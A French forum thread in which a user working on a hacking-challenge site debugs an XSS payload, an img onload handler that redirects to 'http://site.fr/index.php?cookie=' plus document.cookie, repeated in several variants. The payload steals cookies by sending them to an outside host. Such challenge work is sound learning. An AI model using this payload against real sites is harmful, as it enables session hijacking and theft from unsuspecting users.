Probléme concaténation

Question

bonjour,

Je suis inscrit a un site de challenge et je dois faire une redirection vers un site en ajoutant les cookies dans l'adresse via une faille xss.

j'ai donc fait comme sa

onload=javascript:document.location=%27http://site.fr/index.php?cookie=%27%20%2B%20document.cookie;

Cela me redirige bien vers le site mais cela ne m'affiche pas les cookie après cookie= et si je les affiches dans une alert tous marche bien.

quelqu'un pourrait il me dire d'où viens le problème?

Merci d'avance

jérémy

croftman · Answer

Je ne suis pas sur mais :


onload="javascript:document.location='%27

jerem3000 · Answer

c'est exactement ce que je fait.

%27 = '
%20 = espace
%2B = +

cela correspondant a sa une fois que la page est générer.

onload=javascript:document.location='http://site.fr/index.php?cookie=' + document.cookie;

jérémy

croftman · Answer

Et tu ne met pas de " ?

onload="javascript:document.location='http://site.fr/index.php?cookie=' + document.cookie"

jerem3000 · Answer

j'ai essayer avec cela ne marche quand même pas.

J'ai oublier de préciser cela a peut être un intérer ce code se trouve dans dans une balise img.

et en exploitant la faille XSS cela donne quelque chose d'assez moche qui peut provoquer des erreur html mais je pense pas de JS.

je vous met le tous:


[xxxx.php ]


Cela fait 5 heure que je cherche a régler ce problème je commence a désespérer 

jérémy

croftman · Answer

[xxxx.php ]

Ya un .jpg en trop ainsi que le ;

jerem3000 · Answer

je suis désoler j'ai comprit le problème... les cookie avait disparu donc cela n'afficher rien.


je suis désoler de t'avoir fait perdre ton temps croftman et je te remercie d'avoir essayer de m'aider.


jérémy

Probléme concaténation

6 réponses

Votre réponse

Discussions similaires